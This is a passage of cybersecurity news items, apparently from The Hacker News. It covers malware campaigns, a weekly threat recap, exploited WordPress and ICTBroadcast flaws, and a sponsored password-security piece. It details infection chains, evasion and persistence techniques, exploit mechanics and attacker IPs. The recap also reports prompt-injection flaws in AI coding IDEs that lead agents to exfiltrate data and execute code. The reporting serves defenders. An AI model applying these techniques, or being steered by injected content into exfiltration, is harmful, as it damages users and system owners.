Once the decrypted payload is executed, it also takes steps to remove the PowerShell stager from disk and terminates itself to avoid leaving as much forensic trail as possible. The primary goal of the decrypted PowerShell payload is to retrieve and deploy NetSupport RAT, granting the attacker complete control over the compromised host. “The sophistication and layered evasion techniques strongly indicate an actively maintained, professional-grade malware framework,” Securonix said. “Defenders should deploy strong CSP enforcement, script monitoring, PowerShell logging, mshta.exe restrictions, and behavioral analytics to detect such attacks effectively.” Aaron Beardslee, manager of threat research at Securonix, told The Hacker News that the malware’s behavior was determined from dynamic analysis on the desktop side only and that the mobile side was not emulated.

“Static analysis gave us the clues and indicators as to what happens when a mobile device visits an infected site, and that’s where we stopped since we don’t have a mobile test-bed in our lab,” Beardslee added. “This is something we would like to incorporate in the future, though.” CHAMELEON#NET Delivers Formbook Malware The disclosure comes weeks after the company also detailed another multi-stage malspam campaign dubbed CHAMELEON#NET that uses phishing emails to deliver Formbook , a keylogger and information stealer. The email messages are aimed at luring victims in the National Social Security Sector into downloading a seemingly harmless archive after their credentials on a bogus webmail portal designed for this purpose. “This campaign begins with a phishing email that tricks users into downloading a .BZ2 archive, initiating a multi-stage infection chain,” Sangwan said .

“The initial payload is a heavily obfuscated JavaScript file that acts as a dropper, leading to the execution of a complex VB.NET loader. This loader uses advanced reflection and a custom conditional XOR cipher to decrypt and execute its final payload, the Formbook RAT, entirely in memory.” Specifically, the JavaScript dropper decodes and writes to disk in the %TEMP% directory two additional JavaScript files - svchost.js, which drops a .NET loader executable dubbed DarkTortilla (“QNaZg.exe”), a crypter that’s often used to distribute next-stage payloads adobe.js, which drops a file named “PHat.jar,” an MSI installer package that exhibits similar behavior as “svchost.js” In this campaign, the loader is configured to decrypt and execute an embedded DLL, the Formbook malware. Persistence is achieved by adding it to the Windows startup folder to ensure that it’s automatically launched upon a system reboot. Alternatively, it also manages persistence through the Windows Registry.

“The threat actors combine social engineering, heavy script obfuscation, and advanced .NET evasion techniques to successfully compromise targets,” Securonix said. “The use of a custom decryption routine followed by reflective loading allows the final payload to be executed in a fileless manner, significantly complicating detection and forensic analysis.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

⚡ Weekly Recap: USB Malware, React2Shell, WhatsApp Worms, AI IDE Bugs & More

It’s been a week of chaos in code and calm in headlines. A bug that broke the internet’s favorite framework, hackers chasing AI tools, fake apps stealing cash, and record-breaking cyberattacks — all within days. If you blink, you’ll miss how fast the threat map is changing. New flaws are being found, published, and exploited in hours instead of weeks.

AI-powered tools meant to help developers are quickly becoming new attack surfaces. Criminal groups are recycling old tricks with fresh disguises — fake apps, fake alerts, and fake trust. Meanwhile, defenders are racing to patch systems, block massive DDoS waves, and uncover spy campaigns hiding quietly inside networks. The fight is constant, the pace relentless.

For a deeper look at these stories, plus new cybersecurity tools and upcoming expert webinars, check out the full ThreatsDay Bulletin. ⚡ Threat of the Week Max Severity React Flaw Comes Under Attack — A critical security flaw impacting React Server Components (RSC) has come under extensive exploitation within hours of publication disclosure. The vulnerability, CVE-2025-55182 (CVSS score: 10.0), relates to a case of remote code execution that could be triggered by an unauthenticated attacker without requiring any special setup. It’s also tracked as React2Shell.

Amazon reported that it observed attack attempts originating from infrastructure associated with Chinese hacking groups like Earth Lamia and Jackpot Panda within hours of public disclosure of the flaw. Coalition, Fastly, GreyNoise, VulnCheck, and Wiz have also reported seeing exploitation efforts targeting the flaw, indicating that multiple threat actors are engaging in opportunistic attacks. The Shadowserver Foundation said it has detected 28,964 IP addresses vulnerable to the React2Shell flaw as of December 7, 2025, down from 77,664 on December 5, with approximately 10,100 located in the U.S., 3,200 in Germany, and 1,690 in China. 2025 Cloud Security Survey Report Learn from 400+ security leaders and practitioners to get the latest insights and trends on cloud security including risks and threats, leveraging AI, managing deployments, managing cloud data volumes and more.

Read the 2025 Cloud Security Survey Report ➝ 🔔 Top News Over 30 Flaws in AI-Powered IDEs — Security researcher Ari Marzouk disclosed details of more than 30 security vulnerabilities in various artificial intelligence (AI)-powered Integrated Development Environments (IDEs) that combine prompt injection primitives with legitimate features to achieve data exfiltration and remote code execution. The vulnerabilities have been collectively dubbed IDEsaster. “All AI IDEs (and coding assistants that integrate with them) effectively ignore the base software (IDE) in their threat model,” Marzouk said. “They treat their features as inherently safe because they’ve been there for years.

However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives.” Patches have been released to address the issues, with Anthropic acknowledging the risk via a security warning. Chinese Hackers Use BRICKSTORM to Target U.S. Entities — China-linked threat actors, including UNC5221 and Warp Panda, are using a backdoor dubbed BRICKSTORM to maintain long-term persistence on compromised systems, according to an advisory from the U.S. government.

“BRICKSTORM is a sophisticated backdoor for VMware vSphere and Windows environments,” the Cybersecurity and Infrastructure Security Agency (CISA) said. “BRICKSTORM enables cyber threat actors to maintain stealthy access and provides capabilities for initiation, persistence, and secure command-and-control. The activity has once again revived concerns about China’s sustained ability to tunnel deeper into critical infrastructure and government agency networks undetected, often for extended periods. The attacks have also amplified enduring concerns about China’s cyber espionage activity, which has increasingly targeted edge networks and leveraged living-off-the-land techniques to fly under the radar.

GoldFactory Targets Southeast Asia with Bogus Banking Apps — Cybercriminals associated with a financially motivated group known as GoldFactory have been observed staging a fresh round of attacks targeting mobile users in Indonesia, Thailand, and Vietnam by impersonating government services. The activity, observed since October 2024, involves distributing modified banking applications that act as a conduit for Android malware. Group-IB said it has identified more than 300 unique samples of modified banking applications that have led to almost 2,200 infections in Indonesia. The infection chains involve the impersonation of government entities and trusted local brands and approaching prospective targets over the phone to trick them into installing malware by instructing them to click on a link sent on messaging apps like Zalo.

The links redirect the victims to fake landing pages that masquerade as Google Play Store app listings, resulting in the deployment of a remote access trojan like Gigabud, MMRat, or Remo, which surfaced earlier this year using the same tactics as GoldFactory. These droppers then pave the way for the main payload that abuses Android’s accessibility services to facilitate remote control. Cloudflare Blocks Record 29.7 Tbps DDoS Attack — Cloudflare detected and mitigated the largest ever distributed denial-of-service (DDoS) attack that measured at 29.7 terabits per second (Tbps). The activity originated from a DDoS botnet-for-hire known as AISURU, which has been linked to a number of hyper-volumetric DDoS attacks over the past year.

The attack lasted for 69 seconds. It did not disclose the target of the attack. The botnet has prominently targeted telecommunication providers, gaming companies, hosting providers, and financial services. Also tackled by Cloudflare was a 14.1 Bpps DDoS attack from the same botnet.

AISURU is believed to be powered by a massive network comprising an estimated 1-4 million infected hosts worldwide. Brazil Hit by Banking Trojan Spread via WhatsApp Worm — Brazilian users are being targeted by various campaigns that leverage WhatsApp Web as a distribution vector for banking malware. While one campaign attributed to a threat actor known as Water Saci drops a Casbaneiro variant, another set of attacks has led to the deployment of the Astaroth banking trojan. Sophos is tracking the second cluster under the moniker STAC3150 since September 24, 2025.

“The lure delivers a ZIP archive that contains a malicious VBS or HTA file,” Sophos said . “When executed, this malicious file launches PowerShell to retrieve second-stage payloads, including a PowerShell or Python script that collects WhatsApp user data and, in later cases, an MSI installer that delivers the Astaroth malware.” Despite the tactical overlaps, it’s currently not clear if they are the work of the same threat actor. “In this particular campaign, the malware spreads through WhatsApp,” K7 Security Labs said . “Because the malicious file is sent by someone already in our contacts, we tend not to verify its authenticity the same way we would if it came from an unknown sender.

This trust in familiar contacts reduces our caution and increases the chances of the malware being opened and executed.” ‎️‍🔥 Trending CVEs Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week’s most serious security flaws.

Check them, fix what matters first, and stay protected. This week’s list includes — CVE-2025-6389 (Sneeit Framework plugin), CVE-2025-66516 (Apache Tika), CVE-2025-55182 (React), CVE-2025-9491 (Microsoft Windows), CVE-2025-10155, CVE-2025-10156, CVE-2025-10157 (Picklescan), CVE-2025-48633, CVE-2025-48572 (Google Android), CVE-2025-11699 (nopCommerce), CVE-2025-64775 (Apache Struts), CVE-2025-59789 (Apache bRPC), CVE-2025-13751 , CVE-2025-13086 , CVE-2025-12106 (OpenVPN), CVE-2025-13658 (Industrial Video & Control Longwatch), CVE-2024-36424 (K7 Ultimate Security), CVE-2025-66412 (Angular), CVE-2025-13510 (Iskra iHUB and iHUB Lite), CVE-2025-13372, CVE-2025-64460 (Django), CVE-2025-13486 (Advanced Custom Fields: Extended plugin), CVE-2025-64772 (Sony INZONE Hub), CVE-2025-64983 (SwitchBot), CVE-2025-31649, CVE-2025-31361 (Dell ControlVault), CVE-2025-47151 (Entr’ouvert Lasso), CVE-2025-66373 (Akamai), CVE-2025-13654 (Duc), CVE-2025-13032 (Avast), CVE-2025-33211, CVE-2025-33201 (NVIDIA Triton), CVE-2025-66399 (Cacti), CVE-2025-20386, CVE-2025-20387 (Splunk), and CVE-2025-66476 (Vim for Windows). 📰 Around the Cyber World Compromised USBs Used for Crypto Miner Delivery — An ongoing campaign has been observed using USB drives to infect other hosts and deploy cryptocurrency miners since September 2024. While a previous iteration of the campaign used malware families like DIRTYBULK and CUTFAIL , the latest version spotted by AhnLab employs a batch script to launch a dropper DLL that launches PrintMiner, which then installs additional payloads, including XMRig.

“The malware is hidden in a folder, and only a shortcut file named ‘USB Drive’ is visible,” AhnLab said . “When a user opens the shortcut file, they are able to see not only the malware but also the files belonging to the previous user, making it difficult for users to realize that they have been infected with malware.” The development comes as Cyble said it identified an active Linux-targeting campaign that deploys a Mirai-derived botnet codenamed V3G4 that’s paired with a stealthy, fileless-configured cryptocurrency miner. “Once active, the bot masquerades as systemd-logind, performs environment reconnaissance, conducts large-scale raw-socket SSH scanning, maintains persistent C2 communication, and ultimately launches a concealed XMRig-based Monero miner dynamically configured at runtime,” the company said . Fake Cryptocurrency Investment Domain Seized — The U.S.

Department of Justice’s (DoJ) Scam Center Task Force seized Tickmilleas[.]com, a website used by scammers located at the Tai Chang scam compound (aka Casino Kosai) located in the village of Kyaukhat, Burma, to target and defraud Americans through cryptocurrency investment fraud (CIF) scams. “The tickmilleas[.]com domain was disguised as a legitimate investment platform to trick victims into depositing their funds,” the DoJ said . “Victims who used the domain reported to the FBI that the site showed lucrative returns on what they believed to be their investments and displayed purported deposits made by scammers to the victims ‘accounts when the scammers walked the victims through supposed trades.” In tandem, Meta removed approximately 2000 accounts associated with the Tai Chang compound. The domain is also said to have redirected visitors to fraudulent apps hosted on Google Play Store and Apple App Store.

Several of these apps have since been taken down. In a related move, Cambodian officials raided a cyber scam compound in the country’s capital Phnom Penh and arrested 28 suspects. Of the 28 individuals detained, 27 are Vietnamese nationals, and one is Cambodian. Cyber scam compounds in Cambodia are shifting from the country’s western border with Thailand to the east, to locations near the Vietnamese border, according to Cyber Scam Monitor .

Portugal Modifies Cybercrime Law to Exempt Researchers — Portugal has amended its cybercrime law to establish a legal safe harbor for white hat security research and making hacking non-punishable under strict conditions, including identifying vulnerabilities aimed at improving cybersecurity through disclosure, not seeking any economic benefit, immediately reporting the vulnerability to the system owner, deleting any data obtained during the research period within 10 of the vulnerability being fixed, and not violating data privacy regulations like GDPR. Last November, Germany floated a draft law that provided similar protections to the research community when discovering and responsibly reporting security flaws to vendors. CastleRAT Malware Detailed — A remote access trojan called CastleRAT has been detected in the wild with two main builds: a Python version and a compiled C version. While both versions offer similar capabilities, Splunk said the C build is more powerful and can include extra features.

“The malware gathers basic system information, such as computer name, username, machine GUID, public IP address, and product/version details, which it then transmits to the C2 server,” the Cisco-owned company said . “Additionally, it can download and execute further files from the server and provides a remote shell, allowing an attacker to run commands on the compromised machine.” CastleRAT is attributed to a threat actor known as TAG-150 . DoJ Indicts Brothers for Wiping 96 Government Databases — The DoJ indicted two Virginia brothers for allegedly conspiring to steal sensitive information and deleting 96 government databases. Muneeb and Sohaib Akhter, both 34, stole data and deleted databases minutes after they were fired from their contractor roles.

The incident impacted multiple government agencies, including the IRS and DHS. Bloomberg reported in May that the contractor is a software company named Opexus. “Many of these databases contained records and documents related to Freedom of Information Act matters administered by federal government departments and agencies, as well as sensitive investigative files of federal government components,” the DoJ said . The brothers allegedly asked an artificial intelligence tool how to clear system logs of their actions.

In June 2015, the twin brothers were sentenced to several years in prison for conspiracy to commit wire fraud, conspiracy to access a protected computer without authorization, and conspiracy to access a government computer without authorization. They were rehired as government contractors after serving their sentences. Muneeb Akhter faces a maximum penalty of up to 45 years in prison, whereas Sohaib Akhter could get up to six years. U.K.

NCSC Debuts Proactive Notifications — The U.K.’s National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment. The service is delivered through cybersecurity firm Netcraft and is based on publicly available information and internet scanning. “This notification is based on scanning open source information, such as publicly available software versions,” NCSC said . “The service was launched to responsibly report vulnerabilities to system owners to help them protect their services.” FinCEN Ransomware Trend Analysis Reveals Drop in Payments — According to a new analysis released by the U.S.

Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN), ransomware incidents reported to the authority decreased in 2024, with 1,476 incidents following law enforcement’s disruption of two high-profile ransomware groups, BlackCat and LockBit. Financial institutions paid $734 million to ransomware gangs, down from $1.1 billion in 2023. “The median amount of a single ransomware transaction was $124,097 in 2022; $175,000 in 2023; and $155,257 in 2024,” FinCEN said . “Between 2022 and 2024, the most common payment amount range was below $250,000.” More than $2.1 billion was paid to ransomware groups between 2022 and 2024, with about $1.1 billion paid in 2023 alone.

Akira led with the highest number of reported incidents, at 376, but BlackCat received the highest amount in payments, at approximately $395.3 million. Bangladeshi Student Behind New Botnet — A student hacker from Bangladesh is assessed to be behind a new botnet targeting WordPress and cPanel servers. “The perpetrator is using a botnet panel to distribute newly compromised websites to buyers, primarily Chinese threat actors,” Cyderes said . “The sites were primarily compromised via misconfigured WordPress and cPanel instances.” Some of the compromised websites are injected with a PHP-based web shell known as Beima PHP and leased to other threat actors for anywhere between $3 to $200.

The PHP backdoor script is designed to provide remote control over a compromised web server, allowing an attacker to manipulate files, inject arbitrary content, and rename files. The government and education sectors are the primary targets of this campaign, accounting for 76% of the compromised websites for sale. The college student claimed he is selling access to over 5,200 compromised websites through Telegram to pay for his education. Most of the operation’s customers are Chinese threat actors.

U.S. State Department Offers $10m Reward for Iranian Hacker Duo — The U.S. State Department announced a $10 million reward for two Iranian nationals linked to Iran’s cyber operations. Fatemeh Sedighian Kashi and Mohammad Bagher Shirinkar allegedly work for a company named Shahid Shushtari that operates with Iran’s Islamic Revolutionary Guard Corps CyberElectronic Command (IRGC-CEC).

Shahid Shushtari is the latest name for Emennet Pasargad , which has previously been identified as Aria Sepehr Ayandehsazan (ASA), Ayandeh Sazan Sepehr Arya (ASSA), Eeleyanet Gostar, and Net Peygard Samavat Company. The cluster is tracked by the cybersecurity community under the monikers Cobalt Obelisk, Cotton Sandstorm, Haywire Kitten (formerly ChaoticOrchestra), Marnanbridge, and UNC5866. “Shahid Shushtari members have caused significant financial damage and disruption to U.S. businesses and government agencies through coordinated cyber and cyber-enabled information operations,” the State Department said .

“These campaigns have targeted multiple critical infrastructure sectors, including news, shipping, travel, energy, financial, and telecommunications in the United States, Europe, and the Middle East.” The front company has also been linked to a multi-faceted campaign targeting the U.S. presidential election in August 2020. New Arkanix and Sryxen Stealers Spotted — Two new information stealers, Arkanix and Sryxen , are being marketed as a way to steal sensitive data and make short-term, quick financial gains. “Written in C++, [Sryxen] combines DPAPI decryption for traditional browser credentials with a Chrome 127+ bypass that sidesteps Google’s new App-Bound Encryption – by simply launching Chrome headlessly and asking it to decrypt its own cookies via DevTools Protocol,” DeceptIQ said.

“The anti-analysis is ‘more sophisticated’ than most commodity stealers: VEH-based code encryption means the main payload is garbage at rest, only decrypted during execution via exception handling.” The disclosures coincide with a campaign codenamed AIRedScam that uses booby-trapped AI tools shared on GitHub to deliver SmartLoader and other infostealers. “What sets AIRedScam apart is its choice in targeting Offensive Cybersecurity professionals looking for tools that can automate their enumeration and recon,” UltraViolet Cyber said . FBI Warns of Virtual Kidnapping Ransom Scams — The U.S. Federal Bureau of Investigation (FBI) warned that scammers are demanding ransoms in fake kidnapping schemes that alter photos found on social media or other publicly available sites to use as fake proof-of-life photos.

“Criminal actors typically will contact their victims through text message, claiming they have kidnapped their loved one and demand a ransom be paid for their release,” the FBI said . “The criminal actors pose as kidnappers and provide seemingly real photos or videos of victims along with demands for ransom payments. Criminal actors will sometimes purposefully send these photos using timed message features to limit the amount of time victims have to analyze the images.” Russian Hackers Spoof European Security Events in Phishing Wave — Threat actors from Russia have continued to heavily target both Microsoft and Google environments by abusing OAuth and Device Code authentication workflows to phish credentials from end users. “These attacks involved the creation of fake websites masquerading as legitimate international security events taking place in Europe, with the aim of tricking users who registered for these events into granting unauthorized access to their accounts,” Volexity said .

What’s notable about the new wave is that the attackers offer to provide “live support” to targeted users via messaging apps like Signal and WhatsApp to ensure they correctly return the URL, in the case of OAuth phishing workflows. The campaigns, a continuation of prior waves detected earlier this year, have been attributed to a cyber espionage group known as UTA0355. Shanya PaaS Fuels New Attacks — A packer-as-a-service (PaaS) offering known as Shanya has taken over the role previously played by HeartCrypt to decrypt and load a malicious program capable of killing endpoint security solutions. The attack leverages a vulnerable legitimate driver (“ ThrottleStop.sys “) and a malicious unsigned kernel driver (“hlpdrv.sys”) to achieve its goals.

“The user mode killer searches the running processes and installed services,” Sophos researchers Gabor Szappanos and Steeve Gaudreault said . “If it finds a match, it sends a kill command to the malicious kernel driver. The malicious kernel driver abuses the vulnerable clean driver, gaining write access that enables the termination and deletion of the processes and services of the protection products.” The first deployment of the EDR killer is said to have occurred near the end of April 2025 in a Medusa ransomware attack. It has since been put to use in multiple ransomware operations, including Akira, Qilin, and Crytox.

The packer has also been employed to distribute CastleRAT as part of a Booking.com-themed ClickFix campaign. 🎥 Cybersecurity Webinars
How to Detect Hidden Risks in AWS, AI, and Kubernetes — Before Attackers Do: Cloud threats are getting smarter—and harder to see. Join our experts to learn how code-to-cloud detection reveals hidden risks across identities, AI, and Kubernetes, helping you stop attacks before they reach production. Learn How Top Teams Secure Cloud Infrastructure While Staying Fully Compliant; Securing cloud workloads isn’t just defense — it’s about enabling innovation safely.

Learn practical, proven ways to strengthen access control, maintain compliance, and protect infrastructure without slowing agility. 🔧 Cybersecurity Tools RAPTOR — It is an open-source AI-powered security tool that automates code scanning, fuzzing, vulnerability analysis, exploit generation, and OSS forensics. It’s useful when you need to quickly test software for bugs, understand whether a vulnerability is real, or gather evidence from a public GitHub repo. Instead of running many separate tools, RAPTOR chains them together and uses an AI agent to guide the process.

Google Threat Intelligence Browser Extension — For security analysts and threat researchers: highlights suspicious IPs, URLs, domains, and file hashes directly in your browser. Get instant context, investigate without switching tabs, track threats, and collaborate — all while staying protected. Available for Chrome, Edge, and Firefox. Disclaimer: These tools are for learning and research only.

They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws. Conclusion Each story this week points to the same truth: the line between innovation and exploitation keeps getting thinner.

Every new tool brings new risks, and every fix opens the door to the next discovery. The cycle isn’t slowing — but awareness, speed, and shared knowledge still make the biggest difference. Stay sharp, keep your systems patched, and don’t tune out the quiet warnings. The next breach always starts small.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

How Can Retailers Cyber-Prepare for the Most Vulnerable Time of the Year?

The holiday season compresses risk into a short, high-stakes window. Systems run hot, teams run lean, and attackers time automated campaigns to get maximum return. Multiple industry threat reports show that bot-driven fraud, credential stuffing and account takeover attempts intensify around peak shopping events , especially the weeks around Black Friday and Christmas. Why holiday peaks amplify credential risk Credential stuffing and password reuse are attractive to attackers because they scale: leaked username/password lists are tested automatically against retail login portals and mobile apps, and successful logins unlock stored payment tokens, loyalty balances and shipping addresses.

These are assets that can be monetized immediately. Industry telemetry indicates adversaries “pre-stage” attack scripts and configurations in the days before major sale events to ensure access during peak traffic. Retail history also shows how vendor or partner credentials expand the blast radius. The 2013 Target breach remains a classic case: attackers used credentials stolen from an HVAC vendor to gain network access and install malware on POS systems, leading to large-scale card data theft.

That incident is a clear reminder that third-party access must be treated with the same rigor as internal accounts. Customer account security: Passwords, MFA and UX tradeoffs Retailers can’t afford to over-friction checkout flows, but they also can’t ignore the fact that most account takeover attempts start with weak, reused, or compromised passwords . Adaptive (conditional) MFA is the best compromise: prompt for a second factor when the login or transaction is risky (new device, high-value change, anomalous location) but keep the common customer journey smooth. NIST’s digital identity guidance and major vendor recommendations suggest blocking known compromised credentials, focusing on password length and entropy rather than archaic complexity rules, and moving toward phishing-resistant passwordless options such as passkeys where feasible.

Being careful with staff and third-party access can reduce the operational blast radius. Employee and partner accounts often have more authority than customer accounts. Admin consoles, POS backends, vendor portals, and remote access all deserve mandatory MFA and strict access controls. Use SSO with conditional MFA to reduce friction for legitimate staff while protecting high-risk actions, and require privileged credentials to be unique and stored in a vault or PAM system.

Incidents that illustrate the risk Target (2013) : Attackers used stolen vendor credentials to penetrate the network and deploy POS malware, showing how third-party access can enable broad compromise. Boots (2020) : Boots temporarily suspended Advantage Card payments after attackers reused credentials from other breaches to attempt logins, affecting roughly 150,000 customer accounts and forcing an operational response to protect loyalty balances. Zoetop / SHEIN (investigation and settlement) : New York’s Attorney General found Zoetop inadequately handled a large credential compromise, resulting in enforcement action and fines, an example of how poor breach response and weak password handling amplify risk. Technical controls to prevent credential abuse at scale Peak season requires layered defenses that stop automated abuse without creating friction for real users: Bot management and device-behavior fingerprints to separate human shoppers from scripted attacks.

Rate limits and progressive challenge escalation to slow credential-testing campaigns. Credential-stuffing detection that flags behavioral patterns, not just volume. IP reputation and threat intelligence to block known malicious sources. Invisible or risk-based challenge flows instead of aggressive CAPTCHAs that harm conversion.

Industry reports repeatedly call out bot automation and “pre-staged” attack configs as primary drivers of holiday fraud, so investing in these controls ahead of peak weeks pays off. Operational continuity: Test failovers before they’re needed Authentication providers and SMS routes can fail. And if they do during peak trading, the result can be lost revenue and long queues. Retailers should test and document failover procedures: Pre-approved emergency access via short-lived, auditable credentials in a secure vault.

Manual verification of workflows for in-store or phone purchases. Tabletop exercises and load testing that include MFA and SSO failovers. These steps protect revenue as much as they protect data. Where Specops Password Policy helps Specops Password Policy addresses several high-impact controls retailers need before peak weeks: Block compromised and common passwords by checking resets and new passwords against known breach datasets.

Continuously scanning your Active Directory against our database of over 4.5 billion compromised passwords Enforce user-friendly rules (passphrases, pattern blocklists) that improve security without adding help-desk overhead. Integrate with Active Directory for rapid enforcement across POS, admin, and backend systems. Provide operational telemetry so you can spot risky password patterns and ATO attempts early. Book a live walkthrough of Specops Password Policy with an expert today .

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Android Malware FvncBot, SeedSnatcher, and ClayRat Gain Stronger Data Theft Features

Cybersecurity researchers have disclosed details of two new Android malware families dubbed FvncBot and SeedSnatcher , as another upgraded version of ClayRat has been spotted in the wild. The findings come from Intel 471 , CYFIRMA , and Zimperium , respectively. FvncBot, which masquerades as a security app developed by mBank, targets mobile banking users in Poland. What’s notable about the malware is that it’s completely written from scratch and is not inspired by other Android banking trojans like ERMAC that have had their source code leaked.

The malware “implemented multiple features including keylogging by abusing Android’s accessibility services, web-inject attacks, screen streaming and hidden virtual network computing (HVNC) to perform successful financial fraud,” Intel 471 said. Similar to the recently uncovered Albiriox banking malware, the malware is protected by a crypting service known as apk0day that’s offered by Golden Crypt. The malicious app acts as a loader by installing the embedded FvncBot payload. As soon as the dropper app is launched, users are prompted to install a Google Play component to ensure the security and stability of the app, when, in reality, it leads to the deployment of the malware by making use of a session-based approach that has been adopted by other threat actors to bypass accessibility restrictions on Android devices running versions 13 and newer.

“During the malware runtime, the log events were sent to the remote server at the naleymilva.it.com domain to track the current status of the bot,” Intel 471 said. “The operators included a build identifier call_pl, which indicated Poland as a targeted country, and the malware version was set to 1.0-P, suggesting an early stage of development. The malware then proceeds to ask the victim to grant it accessibility services permissions, allowing it to operate with elevated privileges and connect to an external server over HTTP to register the infected device and receive commands in return using the Firebase Cloud Messaging (FCM) service. FvncBot’s process enabling the accessibility service Some of the support functions are listed below - Start/stop a WebSocket connection to remotely control the device and swipe, click, or scroll to navigate the device’s screen Exfiltrate logged accessibility events to the controller Exfiltrate list of installed applications Exfiltrate device information and bot configuration Receive configuration to serve malicious overlays atop targeted applications Show a full screen overlay to capture and exfiltrate sensitive data Hide an overlay Check accessibility services status Abuse accessibility services to log keystrokes Fetch pending commands from the controller Abuse Android’s MediaProjection API to stream screen content FvncBot also facilitates what’s called a text mode to inspect the device screen layout and content even in scenarios where an app prevents screenshots from being taken by setting the FLAG_SECURE option .

It’s currently not known how FvncBot is distributed, but Android banking trojans are known to leverage SMS phishing and third-party app stores as a propagation vector. “Android’s accessibility service is intended to aid users with disabilities, but it also can give attackers the ability to know when certain apps are launched and overwrite the screen’s display,” Intel 471 said. “Although this particular sample was configured to target Polish-speaking users, it is plausible we will observe this theme shifting to target other regions or to impersonate other Polish institutions.” While FvncBot’s core focus is on data theft, SeedSnatcher – distributed under the name Coin through Telegram – is designed to enable the theft of cryptocurrency wallet seed phrases. It also supports the ability to intercept incoming SMS messages to steal two-factor authentication (2FA) codes for account takeovers, as well as capture device data, contacts, call logs, files, and sensitive data by displaying phishing overlays.

It’s assessed that the operators of SeedSnatcher are either China-based or Chinese-speaking based on the presence of Chinese language instructions shared via Telegram and the stealer’s control panel. “The malware leverages advanced techniques to evade detection, including dynamic class loading, stealthy WebView content injection, and integer-based command-and-control instructions,” CYFIRMA said. “While initially requesting minimal runtime permissions such as SMS access, it later escalates privileges to access the Files manager, overlays, contacts, call logs, and more.” The developments come as Zimperium zLabs said it discovered an improved version of ClayRat that has been updated to abuse accessibility services along with exploiting its default SMS permissions, making it a more potent threat capable of recording keystrokes and the screen, serving different overlays like a system update screen to conceal malicious activity, and creating fake interactive notifications to steal victims’ responses. ClayRat’s default SMS and accessibility permission The expansion in ClayRat’s capabilities, in a nutshell, facilitates full device takeover through accessibility services abuse, automated unlocking of device PIN/password/pattern, screen recording, notification harvesting, and persistent overlays.

ClayRat has been disseminated via 25 fraudulent phishing domains that impersonate legitimate services like YouTube, advertising a Pro version for background playback and 4K HDR support. Dropper apps distributing the malware have also been found to mimic Russian taxi and parking applications. “Together, these capabilities make ClayRat a more dangerous spyware compared to its previous version where the victim could uninstall the application or turn off the device upon detecting the infection,” researchers Vishnu Pratapagiri and Fernando Ortega said. Found this article interesting?

Sneeit WordPress RCE Exploited in the Wild While ICTBroadcast Bug Fuels Frost Botnet Attacks

A critical security flaw in the Sneeit Framework plugin for WordPress is being actively exploited in the wild, per data from Wordfence. The remote code execution vulnerability in question is CVE-2025-6389 (CVSS score: 9.8), which affects all versions of the plugin prior to and including 8.3. It has been patched in version 8.4, released on August 5, 2025. The plugin has more than 1,700 active installations.

“This is due to the [sneeit_articles_pagination_callback()] function accepting user input and then passing that through call_user_func(),” Wordfence said . “This makes it possible for unauthenticated attackers to execute code on the server, which can be leveraged to inject backdoors or, for example, create new administrative user accounts.” In other words, the vulnerability can be leveraged to call an arbitrary PHP function, such as wp_insert_user(), to insert a malicious administrator user, which an attacker can then weaponize to seize control of the site and inject malicious code that can redirect site visitors to other sketchy sites, malware, or spam. Wordfence said in-the-wild exploitation commenced on November 24, 2025, the same day it was publicly disclosed, with the company blocking over 131,000 attempts targeting the flaw. Out of these, 15,381 attack attempts were recorded over the past 24 hours alone.

Some of the efforts include sending specially crafted HTTP requests to the “/wp-admin/admin-ajax.php” endpoint to create a malicious admin user account like “arudikadis” and upload a malicious PHP file “tijtewmg.php” that likely grants backdoor access. The attacks have originated from the following IP addresses - 185.125.50[.]59 182.8.226[.]51 89.187.175[.]80 194.104.147[.]192 196.251.100[.]39 114.10.116[.]226 116.234.108[.]143 The WordPress security company said it also observed malicious PHP files that come with capabilities to scan directories, read, edit, or delete files and their permissions, and allow for the extraction of ZIP files. These PHP files go by the names “xL.php,” “Canonical.php,” “.a.php,” and “simple.php.” The “xL.php” shell, per Wordfence, is downloaded by another PHP file called “up_sf.php” that’s designed to exploit the vulnerability. It also downloads an “.htaccess” file from an external server (“racoonlab[.]top”) onto the compromised host.

“This .htaccess file ensures that access to files with certain file extensions is granted on Apache servers,” István Márton said. “This is useful in cases where other .htaccess files prohibit access to scripts, for example, in upload directories.” ICTBroadcast Flaw Exploited to Deliver “Frost” DDoS Botnet The disclosure comes as VulnCheck said it observed fresh attacks exploiting a critical ICTBroadcast flaw ( CVE-2025-2611 , CVSS score: 9.3) targeting its honeypot systems to download a shell script stager that downloads multiple architecture-specific versions of a binary called “frost.” Each of the downloaded versions is executed, followed by the deletion of the payloads and the stager itself to cover up traces of the activity. The end goal of the activity is to carry out distributed denial-of-service (DDoS) attacks against targets of interest. “The ‘frost’ binary combines DDoS tooling with spreader logic that includes fourteen exploits for fifteen CVEs,” VulnCheck’s Jacob Baines said .

“The important part is how it spreads. The operator is not carpet bombing the internet with exploits. ‘Frost’ checks the target first and only proceeds with exploitation when it sees the specific indicators it expects.” For instance, the binary exploits CVE-2025-1610 only after receiving an HTTP response that contains “Set-Cookie: user=(null)” and then a follow-on response to a second request that contains “Set-Cookie: user=admin.” If those markers are not present, the binary stays dormant and does nothing. The attacks are launched from the IP address 87.121.84[.]52.

While the identified vulnerabilities have been exploited by various DDoS botnets, evidence points to the latest attacks being a small, targeted operation, given that there are fewer than 10,000 internet-exposed systems that are susceptible to them. “This limits how large a botnet built on these CVEs can get, which makes this operator a relatively small player,” Baines said. “Notably, the ICTBroadcast exploit that delivered this sample does not appear in the binary, which indicates the operator has additional capabilities not visible here.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

MuddyWater Deploys UDPGangster Backdoor in Targeted Turkey-Israel-Azerbaijan Campaign

